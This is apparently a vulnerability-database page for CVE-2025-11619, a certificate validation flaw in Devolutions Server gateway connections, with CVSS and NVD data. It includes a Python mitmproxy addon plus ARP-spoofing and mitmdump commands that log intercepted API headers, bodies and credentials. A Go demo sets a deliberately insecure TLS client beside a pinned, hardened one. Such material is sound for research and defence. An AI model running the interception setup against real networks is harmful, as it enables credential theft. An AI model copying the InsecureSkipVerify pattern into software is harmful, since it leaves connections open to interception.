Security Vulnerability Report
CVE-2025-11619 CVSS 8.8 HIGH

CVE-2025-11619

Published: 2025-10-15 20:15:34
Last Modified: 2025-12-03 14:51:59

Description

Improper certificate validation when connecting to gateways in Devolutions Server 2025.3.2 and earlier allows attackers in MitM position to intercept traffic.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:* (all versions before 2025.2.15.0) - VULNERABLE
cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:* (versions from 2025.3.2.0 up to, but excluding, 2025.3.3.0) - VULNERABLE
Devolutions Server <= 2025.3.2 (the two affected ranges above come from the NVD configuration data; the fixed releases are the excluded upper bounds, 2025.2.15.0 and 2025.3.3.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-11619 - Devolutions Server Improper Certificate Validation PoC

This PoC demonstrates a Man-in-the-Middle attack exploiting the lack of
proper TLS certificate validation when Devolutions Server connects to its
Gateway component: because the server does not validate the gateway's
certificate, it accepts the forged certificate an interception proxy presents.

Requirements:
  - mitmproxy (this file is loaded as a mitmdump addon script)
  - Network position to intercept traffic (ARP spoofing / DNS poisoning)
  - Python 3.x
"""
import logging

from mitmproxy import http

log = logging.getLogger(__name__)


# Step 1: Generate a self-signed certificate for the gateway hostname.
# This simulates what an attacker would do to intercept TLS traffic.
def generate_fake_cert():
    """
    In a real attack scenario the attacker uses a tool like mitmproxy,
    Bettercap or Ettercap to dynamically generate certificates for the
    target (gateway) hostname.

    mitmproxy forges a leaf certificate per hostname, signed by its own CA.
    A client that validates the chain rejects it; the vulnerable Devolutions
    Server does not validate properly, so it accepts the forged certificate.
    Nothing to do here: mitmproxy handles certificate generation itself.
    """


# Step 2: ARP spoofing to get into MitM position
def arp_spoof(target_ip, gateway_ip, interface="eth0"):
    """
    Use arpspoof or scapy to poison ARP caches and intercept traffic.
    Example with scapy:
        from scapy.all import ARP, send
        send(ARP(op=2, pdst=target_ip, psrc=gateway_ip), iface=interface)
    """
    print(f"[*] Performing ARP spoofing between {target_ip} and {gateway_ip}")
    print("[*] Attacker is now in Man-in-the-Middle position")


# Step 3: Intercept and capture credentials from Devolutions Server traffic
class DevolutionsInterceptor:
    def __init__(self):
        self.captured_data = []

    def request(self, flow: http.HTTPFlow) -> None:
        """
        Intercept HTTP/HTTPS requests from Devolutions Server to the Gateway
        and record anything that looks like credentials or session tokens.
        """
        # Look for Devolutions Server API endpoints
        if "/api/" not in flow.request.pretty_url:
            return
        log.info("[+] Intercepted Devolutions API call: %s", flow.request.pretty_url)
        log.info("[+] Request headers: %s", dict(flow.request.headers))
        if flow.request.content:
            log.info("[+] Request body: %r", flow.request.content[:500])
        self.captured_data.append({
            "url": flow.request.pretty_url,
            "method": flow.request.method,
            "headers": dict(flow.request.headers),
            "body": flow.request.content[:1000] if flow.request.content else None,
        })

    def response(self, flow: http.HTTPFlow) -> None:
        """Log the Gateway's response status for intercepted API calls."""
        if "/api/" in flow.request.pretty_url:
            log.info("[+] Response %s for %s", flow.response.status_code, flow.request.pretty_url)

    def running(self):
        log.info("[*] MitM proxy started - intercepting Devolutions Server traffic")
        log.info("[*] Waiting for Devolutions Server to connect to Gateway...")


# mitmdump loads the hooks above from this list when started with -s <this file>
addons = [DevolutionsInterceptor()]


# Step 4: Main execution - print how to run mitmproxy with this addon loaded
if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-11619 PoC - Devolutions Server MitM Attack")
    print("=" * 60)
    # mitmproxy presents forged certificates that proper validation rejects;
    # Devolutions Server < 2025.3.3 (and < 2025.2.15) accepts them.
    # --ssl-insecure is the attacker side: the proxy itself does not validate
    # the real Gateway certificate when it connects upstream.
    # Start ARP spoofing to redirect traffic through the proxy:
    # arp_spoof("<devolutions_server_ip>", "<gateway_ip>")
    print("[*] Run: mitmdump -s devolutions_interceptor.py --mode transparent "
          "--listen-host 0.0.0.0 --listen-port 8080 --ssl-insecure")
    print("[*] When Devolutions Server connects to Gateway, traffic will be intercepted")
    print("[*] Captured credentials and session data will be logged by the addon")

# Usage:
#   1. Set up ARP spoofing: arpspoof -i eth0 -t <target> <gateway>
#   2. Enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward
#   3. Run mitmproxy: mitmdump -s this_script.py --mode transparent
#   4. Wait for Devolutions Server to connect to Gateway
#   5. Intercepted credentials will be captured
#
# Impact:
#   - Credential theft (remote desktop passwords, SSH keys, database credentials)
#   - Session hijacking
#   - Data tampering (inject malicious responses)
#   - Full compromise of managed remote connections
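The PoC above only works because the client side of the gateway connection accepts the interceptor's forged certificate. The Go program below, added here as an illustration and not code from Devolutions, from the advisory or from the original report, reproduces that condition entirely in memory: it mints two self-signed certificates for an assumed gateway name (`gateway.example.internal`, a placeholder; the advisory names no host), one acting as the real gateway certificate and one as the forgery a mitmproxy-style interceptor presents, then runs in-process TLS handshakes over `net.Pipe` (no network) against a client with verification switched off (the CWE-295 pattern this CVE is classified under) and a client that pins the gateway certificate and checks the hostname. All keys, certificates and names are constructed for the demo; nothing here reflects how Devolutions Server actually implements its gateway client.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/tls"
	"crypto/x509"
	"crypto/x509/pkix"
	"errors"
	"fmt"
	"math/big"
	"net"
	"time"
)

// gatewayHost is an assumed name for this demo; the advisory names no host.
const gatewayHost = "gateway.example.internal"

// mustSelfSigned mints a self-signed server certificate for host (constructed
// test material). One stands in for the gateway's real certificate; a second
// one for the same name is the forgery an interceptor such as mitmproxy serves.
func mustSelfSigned(host string) (tls.Certificate, *x509.Certificate) {
	key, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	tmpl := &x509.Certificate{
		SerialNumber: big.NewInt(1),
		Subject:      pkix.Name{CommonName: host},
		DNSNames:     []string{host},
		NotBefore:    time.Now().Add(-time.Hour),
		NotAfter:     time.Now().Add(24 * time.Hour),
		KeyUsage:     x509.KeyUsageDigitalSignature,
		ExtKeyUsage:  []x509.ExtKeyUsage{x509.ExtKeyUsageServerAuth},
	}
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, &key.PublicKey, key)
	if err != nil {
		panic(err)
	}
	leaf, _ := x509.ParseCertificate(der) // DER we just produced always parses
	return tls.Certificate{Certificate: [][]byte{der}, PrivateKey: key, Leaf: leaf}, leaf
}

// asyncConn queues the server's writes so the synchronous net.Pipe used below
// cannot deadlock when the client aborts the handshake in the middle of a flight.
type asyncConn struct {
	net.Conn
	q chan []byte
}

func newAsyncConn(c net.Conn) *asyncConn {
	a := &asyncConn{Conn: c, q: make(chan []byte, 64)}
	go func() {
		for b := range a.q {
			_, _ = a.Conn.Write(b) // once the pipe is closed this fails fast; keep draining
		}
	}()
	return a
}

func (a *asyncConn) Write(b []byte) (int, error) { a.q <- append([]byte(nil), b...); return len(b), nil }
func (a *asyncConn) Close() error                { close(a.q); return a.Conn.Close() }

// clientHandshake runs one in-memory TLS handshake against a server presenting
// cert and returns the client's verdict: nil means the certificate was accepted.
func clientHandshake(cert tls.Certificate, cfg *tls.Config) error {
	srvSide, cliSide := net.Pipe()
	done := make(chan struct{})
	go func() {
		defer close(done)
		srv := newAsyncConn(srvSide)
		_ = tls.Server(srv, &tls.Config{Certificates: []tls.Certificate{cert}}).Handshake()
		srv.Close() // raw close, no close_notify: neither side waits on the other
	}()
	err := tls.Client(cliSide, cfg).Handshake()
	cliSide.Close()
	<-done
	return err
}

// rejectedForCertReason reports whether err is what a validating client must
// return against a forged gateway: an untrusted issuer or a name mismatch.
func rejectedForCertReason(err error) bool {
	var unknownCA x509.UnknownAuthorityError
	var badName x509.HostnameError
	return errors.As(err, &unknownCA) || errors.As(err, &badName)
}

// vulnerableConfig is the CWE-295 pattern: chain and hostname checks are off,
// so a forged certificate for the gateway name is accepted silently.
func vulnerableConfig(host string) *tls.Config {
	return &tls.Config{ServerName: host, InsecureSkipVerify: true}
}

// hardenedConfig trusts only the gateway certificate (or CA) pinned at
// configuration time and checks the presented name against host.
func hardenedConfig(host string, trusted *x509.Certificate) *tls.Config {
	pool := x509.NewCertPool()
	pool.AddCert(trusted)
	return &tls.Config{ServerName: host, RootCAs: pool, MinVersion: tls.VersionTLS12}
}

func main() {
	legit, leaf := mustSelfSigned(gatewayHost)
	forged, _ := mustSelfSigned(gatewayHost) // same name, attacker-controlled key
	fmt.Println("vulnerable client, forged cert:", clientHandshake(forged, vulnerableConfig(gatewayHost)))
	fmt.Println("hardened client, forged cert:  ", clientHandshake(forged, hardenedConfig(gatewayHost, leaf)))
	fmt.Println("hardened client, real cert:    ", clientHandshake(legit, hardenedConfig(gatewayHost, leaf)))
}
```

`go run` prints `<nil>` for the first line (the vulnerable client completes the handshake with the forgery, which is exactly what lets the PoC read the traffic), a `tls: failed to verify certificate: x509: certificate signed by unknown authority` error for the second, and `<nil>` for the third. `rejectedForCertReason` is the check a regression test for a fixed client should assert on: not merely "some error", but an untrusted-issuer or hostname error, so that a later change cannot reintroduce `InsecureSkipVerify` or a permissive verification callback unnoticed.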

References

https://devolutions.net/security/advisories/DEVO-2025-0014/ (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11619", "sourceIdentifier": "[email protected]", "published": "2025-10-15T20:15:34.287", "lastModified": "2025-12-03T14:51:58.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper certificate validation when connecting to gateways in Devolutions Server 2025.3.2 and earlier allows attackers in MitM position to intercept traffic."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-295"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.2.15.0", "matchCriteriaId": "E95B3F21-FCCF-430F-A006-2964EA8B10CC"}, {"vulnerable": true, "criteria": "cpe:2.3:a:devolutions:devolutions_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.3.2.0", "versionEndExcluding": "2025.3.3.0", "matchCriteriaId": "6EFFA6AC-7EC1-42C1-B3AB-7E953AA46D08"}]}]}], "references": [{"url": "https://devolutions.net/security/advisories/DEVO-2025-0014/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}